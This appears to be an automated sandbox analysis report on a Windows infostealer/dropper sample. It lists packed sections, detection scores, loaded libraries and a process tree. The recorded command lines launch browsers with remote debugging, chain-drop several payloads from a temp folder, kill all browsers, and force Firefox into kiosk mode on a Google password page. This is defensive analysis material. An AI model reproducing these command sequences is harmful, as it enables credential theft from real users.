                          Source: rhnew[1].exe.22.drStatic PE information: Section: bilyxzuf ZLIB complexity 0.9942948346872154
                          Source: rhnew.exe.22.drStatic PE information: Section: ZLIB complexity 1.000201798892989
                          Source: rhnew.exe.22.drStatic PE information: Section: bilyxzuf ZLIB complexity 0.9942948346872154
                          Source: random[1].exe0.22.drStatic PE information: Section: ZLIB complexity 0.9979009119217082
                          Source: random[1].exe0.22.drStatic PE information: Section: madnojdh ZLIB complexity 0.9943187878141483
                          Source: fc1511c233.exe.22.drStatic PE information: Section: ZLIB complexity 0.9979009119217082
                          Source: fc1511c233.exe.22.drStatic PE information: Section: madnojdh ZLIB complexity 0.9943187878141483
                          Source: random[2].exe.22.drStatic PE information: Section: oswdvyxj ZLIB complexity 0.9946977459016394
                          Source: 6ae2430bb1.exe.22.drStatic PE information: Section: oswdvyxj ZLIB complexity 0.9946977459016394
                          Source: random[1].exe0.22.drStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
                          Source: fc1511c233.exe.22.drStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
                          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@75/75@26/18
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9D7030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,0_2_6C9D7030
                          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\2M9851QN.htmJump to behavior
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6896:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8124:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7808:120:WilError_03
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeMutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2836:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3052:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7284:120:WilError_03
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeFile created: C:\Users\user\AppData\Local\Temp\abc3bc1985Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                          Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                          Source: file.exe, 00000000.00000002.2744845307.000000001DA70000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761636482.000000006CBAF000.00000002.00000001.01000000.00000009.sdmp, file.exe, 00000000.00000002.2761038779.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                          Source: file.exe, 00000000.00000002.2744845307.000000001DA70000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761636482.000000006CBAF000.00000002.00000001.01000000.00000009.sdmp, file.exe, 00000000.00000002.2761038779.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                          Source: file.exe, 00000000.00000002.2744845307.000000001DA70000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761636482.000000006CBAF000.00000002.00000001.01000000.00000009.sdmp, file.exe, 00000000.00000002.2761038779.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                          Source: file.exe, 00000000.00000002.2744845307.000000001DA70000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761636482.000000006CBAF000.00000002.00000001.01000000.00000009.sdmp, file.exe, 00000000.00000002.2761038779.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                          Source: file.exe, file.exe, 00000000.00000002.2744845307.000000001DA70000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761636482.000000006CBAF000.00000002.00000001.01000000.00000009.sdmp, file.exe, 00000000.00000002.2761038779.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                          Source: file.exe, 00000000.00000002.2744845307.000000001DA70000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761038779.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
                          Source: file.exe, 00000000.00000002.2744845307.000000001DA70000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761636482.000000006CBAF000.00000002.00000001.01000000.00000009.sdmp, file.exe, 00000000.00000002.2761038779.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                          Source: file.exe, 00000000.00000003.2492234094.000000001D990000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2350095249.000000001D975000.00000004.00000020.00020000.00000000.sdmp, fc1511c233.exe, 0000001B.00000003.3247838752.0000000005B3F000.00000004.00000800.00020000.00000000.sdmp, fc1511c233.exe, 0000001B.00000003.3247676352.0000000005B5A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                          Source: file.exe, 00000000.00000002.2744845307.000000001DA70000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761038779.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                          Source: file.exe, 00000000.00000002.2744845307.000000001DA70000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761038779.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
                          Source: file.exeReversingLabs: Detection: 36%
                          Source: file.exeVirustotal: Detection: 40%
                          Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                          Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2528 --field-trial-handle=2304,i,13957326758285335297,13387350500971898987,262144 /prefetch:8
                          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=""
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2388 --field-trial-handle=2280,i,12676847085568592327,10287468504227214058,262144 /prefetch:3
                          Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2204 --field-trial-handle=1988,i,4276003573003532254,7619762625833500772,262144 /prefetch:3
                          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\Documents\EBFBFBFIIJ.exe"
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\Documents\EBFBFBFIIJ.exe "C:\Users\user\Documents\EBFBFBFIIJ.exe"
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1012278001\rhnew.exe "C:\Users\user\AppData\Local\Temp\1012278001\rhnew.exe"
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1012279001\e6d73861f4.exe "C:\Users\user\AppData\Local\Temp\1012279001\e6d73861f4.exe"
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe "C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe"
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exe "C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exe"
                          Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe "C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe"
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exe "C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exe"
                          Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
                          Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
                          Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
                          Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
                          Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
                          Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                          Source: unknownProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking --attempting-deelevation
                          Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                          Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exe "C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exe"
                          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=""Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\Documents\EBFBFBFIIJ.exe"Jump to behavior
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2528 --field-trial-handle=2304,i,13957326758285335297,13387350500971898987,262144 /prefetch:8Jump to behavior
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /TJump to behavior
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2388 --field-trial-handle=2280,i,12676847085568592327,10287468504227214058,262144 /prefetch:3Jump to behavior
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2204 --field-trial-handle=1988,i,4276003573003532254,7619762625833500772,262144 /prefetch:3Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\Documents\EBFBFBFIIJ.exe "C:\Users\user\Documents\EBFBFBFIIJ.exe" Jump to behavior
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1012278001\rhnew.exe "C:\Users\user\AppData\Local\Temp\1012278001\rhnew.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1012279001\e6d73861f4.exe "C:\Users\user\AppData\Local\Temp\1012279001\e6d73861f4.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe "C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exe "C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exe "C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                          Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                          Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: unknown unknown
                          Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: unknown unknown
                          Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: unknown unknown
                          Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: unknown unknown
                          Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: unknown unknown
                          Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: dpapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: dnsapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: rasadhlp.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: mozglue.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: wsock32.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: vcruntime140.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: msvcp140.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: slc.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: pcacli.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: mpr.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: sfc_os.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeSection loaded: winmm.dllJump to behavior
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeSection loaded: mstask.dllJump to behavior
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeSection loaded: mpr.dllJump to behavior
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeSection loaded: dui70.dllJump to behavior
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeSection loaded: duser.dllJump to behavior
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeSection loaded: chartv.dllJump to behavior
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeSection loaded: oleacc.dllJump to behavior
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeSection loaded: atlthunk.dllJump to behavior
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeSection loaded: textinputframework.dllJump to behavior
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeSection loaded: coreuicomponents.dllJump to behavior
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeSection loaded: coremessaging.dllJump to behavior
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeSection loaded: coremessaging.dllJump to behavior
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeSection loaded: wtsapi32.dllJump to behavior
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeSection loaded: winsta.dllJump to behavior
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeSection loaded: textshaping.dllJump to behavior
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeSection loaded: explorerframe.dllJump to behavior
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeSection loaded: slc.dllJump to behavior
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeSection loaded: sppc.dllJump to behavior
